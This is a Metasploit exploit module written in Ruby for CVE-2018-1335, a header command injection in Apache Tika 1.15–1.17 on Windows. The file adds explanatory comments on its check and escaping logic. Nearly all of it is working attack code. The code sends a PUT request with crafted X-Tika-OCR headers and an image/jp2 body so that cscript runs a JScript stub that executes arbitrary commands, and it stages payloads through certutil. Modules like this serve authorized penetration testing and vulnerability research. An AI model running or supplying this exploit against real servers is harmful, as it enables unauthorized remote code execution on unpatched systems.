GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
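class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell
  prepend Msf::Exploit::Remote::AutoCheck

  # Version banner served on the Tika server's root page; the capture is the
  # major.minor version string. The dot is escaped on purpose so it cannot
  # match an arbitrary character (the previous pattern used a bare `.`).
  VERSION_BANNER = /Apache Tika (\d+\.\d+)/.freeze

  # Lowest and highest major.minor versions that `check` reports as vulnerable;
  # these are the versions the 'Description' says were verified on Windows.
  VULNERABLE_FROM = '1.15'
  VULNERABLE_TO = '1.17'

  # Registers the module metadata and its options.
  #
  # Options: RPORT defaults to 9998 (tika-server's default port), TARGETURI
  # defaults to '/'. The only CmdStager flavor configured is 'certutil'.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Tika Header Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in Apache
          Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is
          used to bypass magic bytes checking. When OCR is specified in the
          request, parameters can be passed to change the parameters passed
          at command line to allow for arbitrary JScript to execute. A
          JScript stub is passed to execute arbitrary code. This module was
          verified against version 1.15 - 1.17 on Windows 2012.
          While the CVE and finding show more versions vulnerable, during
          testing it was determined only > 1.14 was exploitable due to
          jp2 support being added.
        },
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Platform' => 'win',
              'CmdStagerFlavor' => ['certutil']
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2018-04-25',
        'Author' => [
          'h00die', # msf module
          'David Yesland', # edb submission
          'Tim Allison' # discovery
        ],
        'References' => [
          ['EDB', '46540'],
          ['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
          ['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
          ['CVE', '2018-1335']
        ],
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(9998),
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
      ]
    )
  end

  # Fingerprints the server from the version banner on its root page.
  #
  # This is a banner check only: it does not attempt the injection, so a
  # server that hides or rewrites its banner is reported as Safe.
  #
  # @return [CheckCode] Vulnerable when the detected major.minor version lies
  #   within VULNERABLE_FROM..VULNERABLE_TO (inclusive); Safe when there is no
  #   response, the status is not 200, no banner is found, or the version is
  #   outside that range
  def check
    res = send_request_cgi({ 'uri' => normalize_uri(target_uri) })

    if res.nil?
      vprint_error('No server response, check configuration')
      return CheckCode::Safe
    end

    unless res.code == 200
      # Distinct message from the no-response case so the operator can tell
      # a reachable-but-unexpected service apart from no service at all.
      vprint_error("Unexpected HTTP status #{res.code}, check configuration")
      return CheckCode::Safe
    end

    # Regexp#match tolerates a nil body, unlike `res.body =~` on Ruby >= 3.2.
    banner = VERSION_BANNER.match(res.body)
    return CheckCode::Safe unless banner

    version = Rex::Version.new(banner[1])
    vprint_status("Apache Tika Version Detected: #{version}")

    lower = Rex::Version.new(VULNERABLE_FROM)
    upper = Rex::Version.new(VULNERABLE_TO)
    return CheckCode::Vulnerable if version.between?(lower, upper)

    CheckCode::Safe
  end

  # CmdStager callback: wraps one staged command line in a JScript stub and
  # submits it as the body of a PUT to <TARGETURI>/meta. The X-Tika-OCR*
  # headers carry the injected command-line parameters described in
  # 'Description'; the image/jp2 content type selects the OCR path.
  #
  # The command is interpolated verbatim into a double-quoted JScript string
  # literal. A double quote inside cmd would terminate that literal, so such
  # a command is rejected up front instead of being sent as a broken stub
  # (the previous `cmd.gsub(/"/, '\"')` call discarded its result and never
  # escaped anything).
  #
  # @param cmd [String] command line to run via `cmd /c` on the target
  # @param opts [Hash] unused; present for the CmdStager interface
  # @raise [Msf::Exploit::Failed] via fail_with when cmd contains a double
  #   quote, when the server does not respond, or when the reply is not a
  #   200 whose body mentions 'tika'
  def execute_command(cmd, opts = {})
    if cmd.include?('"')
      fail_with(Failure::BadConfig, 'Staged command contains a double quote, which cannot be embedded in the JScript stub')
    end

    jscript = "var oShell = WScript.CreateObject('WScript.Shell');\n" \
              "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"

    meta_uri = normalize_uri(target_uri, 'meta')
    print_status("Sending PUT request to #{peer}#{meta_uri}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => meta_uri,
      'headers' => {
        'X-Tika-OCRTesseractPath' => '"cscript"',
        'X-Tika-OCRLanguage' => '//E:Jscript',
        'Expect' => '100-continue',
        'Content-type' => 'image/jp2',
        'Connection' => 'close'
      },
      'data' => jscript
    })

    fail_with(Failure::Disconnected, 'No server response') unless res

    # to_s guards against a nil body on an otherwise well-formed response.
    return if res.code == 200 && res.body.to_s.include?('tika')

    fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
  end

  # Drives the CmdStager; every staged line is delivered through
  # execute_command. linemax bounds the length of each staged command line.
  def exploit
    execute_cmdstager(linemax: 8000)
  end
end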